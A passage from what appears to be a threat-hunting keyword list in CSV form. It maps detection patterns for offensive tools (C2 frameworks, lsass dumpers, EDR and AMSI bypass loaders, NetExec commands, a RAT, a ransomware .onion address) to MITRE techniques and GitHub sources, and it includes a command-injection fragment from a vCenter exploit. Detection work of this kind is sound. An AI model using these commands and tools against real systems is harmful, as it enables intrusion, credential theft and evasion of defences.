Exfiltration","https://github.com/evallen/ntpescape","1","1","N/A","N/A","10","2","138","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z","53719" "*NtRemoteLoad-main*",".{0,1000}NtRemoteLoad\-main.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","53720" "*ntrights.exe*",".{0,1000}ntrights\.exe.{0,1000}","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - 
T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","N/A","7","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","53721" "*NTT-Security-Japan/pac2*",".{0,1000}NTT\-Security\-Japan\/pac2.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","1","N/A","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","53722" "*NtUserMNDragOverExploit*",".{0,1000}NtUserMNDragOverExploit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","53723" "*NtWa1tF0rS1ngle0bj3ct Executed*",".{0,1000}NtWa1tF0rS1ngle0bj3ct\sExecuted.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","53724" "*Nuages*/Implants*",".{0,1000}Nuages.{0,1000}\/Implants.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53725" "*nuages.clearImplants *",".{0,1000}nuages\.clearImplants\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53726" 
"*nuages.getAutoruns*",".{0,1000}nuages\.getAutoruns.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53727" "*nuages.getImplants*",".{0,1000}nuages\.getImplants.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53728" "*nuages.getListeners*",".{0,1000}nuages\.getListeners.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53729" "*nuages.printImplants*",".{0,1000}nuages\.printImplants.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53730" "*nuages.printListeners*",".{0,1000}nuages\.printListeners.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53731" "*nuages_cli.js*",".{0,1000}nuages_cli\.js.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - 
TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53732" "*NuagesC2Connector*",".{0,1000}NuagesC2Connector.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53733" "*NuagesC2Implant*",".{0,1000}NuagesC2Implant.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53734" "*NuagesPythonImplant*",".{0,1000}NuagesPythonImplant.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53735" "*NuagesSharpImplant*",".{0,1000}NuagesSharpImplant.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53736" "*nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt*",".{0,1000}nuclei\s\-t\s\~\/tool\/nuclei\/nuclei\-templates\/cves\/CVE\-2020\-5902\.yaml\s\-l\shttps\.txt.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53737" "*nuclei -t 
workflows/bigip-pwner-workflow.yaml*",".{0,1000}nuclei\s\-t\sworkflows\/bigip\-pwner\-workflow\.yaml.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53738" "*nuclei -u *",".{0,1000}nuclei\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","53739" "*nuclei-burp-plugin*",".{0,1000}nuclei\-burp\-plugin.{0,1000}","offensive_tool_keyword","Xerror","A BurpSuite plugin intended to help with nuclei template generation.","T1083 - T1069 - T1204 - T1059 - T1078","TA0007 - TA0005 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/projectdiscovery/nuclei-burp-plugin","1","1","N/A","network exploitation tool","N/A","10","1234","120","2024-09-11T09:29:20Z","2022-01-17T10:31:33Z","53740" "*nuitka --onefile barrel.py*",".{0,1000}nuitka\s\-\-onefile\sbarrel\.py.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","53741" "*nuitka --onefile lock.py*",".{0,1000}nuitka\s\-\-onefile\slock\.py.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 
- T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","53742" "*nuitka --onefile shock.py*",".{0,1000}nuitka\s\-\-onefile\sshock\.py.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","53743" "*Nuke_Privileges /Process:*",".{0,1000}Nuke_Privileges\s\/Process\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","53744" "*NUL0x4C/APCLdr*",".{0,1000}NUL0x4C\/APCLdr.{0,1000}","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","1","N/A","N/A","N/A","4","316","54","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z","53745" "*NUL0x4C/AtomLdr*",".{0,1000}NUL0x4C\/AtomLdr.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","N/A","8","712","91","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z","53746" 
"*null-byte.com/bypass-amsi*",".{0,1000}null\-byte\.com\/bypass\-amsi.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","53747" "*nullinux -rid -range *",".{0,1000}nullinux\s\-rid\s\-range\s.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","53748" "*nullinux -shares -U *",".{0,1000}nullinux\s\-shares\s\-U\s.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","53749" "*nullinux -users *",".{0,1000}nullinux\s\-users\s.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","53750" "*nxc ftp *bruteforce*",".{0,1000}nxc\sftp\s.{0,1000}bruteforce.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps 
automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53752" "*nxc http *--port*",".{0,1000}nxc\shttp\s.{0,1000}\-\-port.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53753" "*nxc ldap * --admin-count*",".{0,1000}nxc\sldap\s.{0,1000}\s\-\-admin\-count.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53754" "*nxc ldap * --trusted-for-delegation*",".{0,1000}nxc\sldap\s.{0,1000}\s\-\-trusted\-for\-delegation.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53755" "*nxc mssql 
*--get-file*",".{0,1000}nxc\smssql\s.{0,1000}\-\-get\-file.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53756" "*nxc mssql *--local-auth*",".{0,1000}nxc\smssql\s.{0,1000}\-\-local\-auth.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53757" "*nxc smb * -x whoami*",".{0,1000}nxc\ssmb\s.{0,1000}\s\-x\swhoami.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53758" "*nxc smb *.csv -u *",".{0,1000}nxc\ssmb\s.{0,1000}\.csv\s\-u\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53759" "*nxc smb *.txt -u *",".{0,1000}nxc\ssmb\s.{0,1000}\.txt\s\-u\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53760" "*nxc ssh *",".{0,1000}nxc\sssh\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53761" "*nxc winrm * -X *",".{0,1000}nxc\swinrm\s.{0,1000}\s\-X\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53762" "*nxc*nxcdb.py*",".{0,1000}nxc.{0,1000}nxcdb\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53763" "*nxc.netexec:main*",".{0,1000}nxc\.netexec\:main.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53764" "*nxc.protocols.smb*",".{0,1000}nxc\.protocols\.smb.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53765" "*nxcdb-zipapp-*",".{0,1000}nxcdb\-zipapp\-.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53766" "*nxx3cy6aee2s53v7v5pxrfv7crfssw7hmgejbj47cv6xuak3bgncllqd.onion*",".{0,1000}nxx3cy6aee2s53v7v5pxrfv7crfssw7hmgejbj47cv6xuak3bgncllqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53767" "*Nxy8P0NrG2AqvW5n5IAlaEbxDvev9hTfHiktFAhCDboW5oqsPSFu7/xd6lTi43sXD4yfw=*",".{0,1000}Nxy8P0NrG2AqvW5n5IAlaEbxDvev9hTfHiktFAhCDboW5oqsPSFu7\/xd6lTi43sXD4yfw\=.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","0","#base64","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","53768" "*NYAN-x-CAT/Lime-Crypter*",".{0,1000}NYAN\-x\-CAT\/Lime\-Crypter.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","1","N/A","N/A","9","6","515","199","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z","53769" "*NYAN-x-CAT/Lime-RAT*",".{0,1000}NYAN\-x\-CAT\/Lime\-RAT.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","53770" "*NYANxCAT@pm.me*",".{0,1000}NYANxCAT\@pm\.me.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - 
T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","#email","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","53771" "*nysm.skel.h*",".{0,1000}nysm\.skel\.h.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","0","N/A","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","53772" "*nysm-master.zip*",".{0,1000}nysm\-master\.zip.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","1","N/A","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","53773" "*NytroRST/NetRipper*",".{0,1000}NytroRST\/NetRipper.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","1","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","53774" "*nyxgeek/dirdevil*",".{0,1000}nyxgeek\/dirdevil.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/nyxgeek/dirdevil","1","1","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","53775" "*nyxgeek/lyncsmash*",".{0,1000}nyxgeek\/lyncsmash.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","53776" "*nyxgeek/ntlmscan*",".{0,1000}nyxgeek\/ntlmscan.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","N/A","4","359","57","2024-06-27T11:10:32Z","2019-10-23T06:02:56Z","53777" "*nyxgeek/o365recon*",".{0,1000}nyxgeek\/o365recon.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","53778" "*nyxgeek/teamstracker*",".{0,1000}nyxgeek\/teamstracker.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","N/A","3","1","54","4","2024-06-27T11:57:35Z","2023-08-15T03:41:46Z","53779" "*-o kitten.exe*",".{0,1000}\-o\s\skitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","53780" "*-o ProxyCommand=;/bin/bash -c *--locationPassword*",".{0,1000}\-o\sProxyCommand\=\;\/bin\/bash\s\-c\s.{0,1000}\-\-locationPassword.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","0","#linux","N/A","10","1","42","8","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z","53781" "*o_getprivs*",".{0,1000}o_getprivs.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - 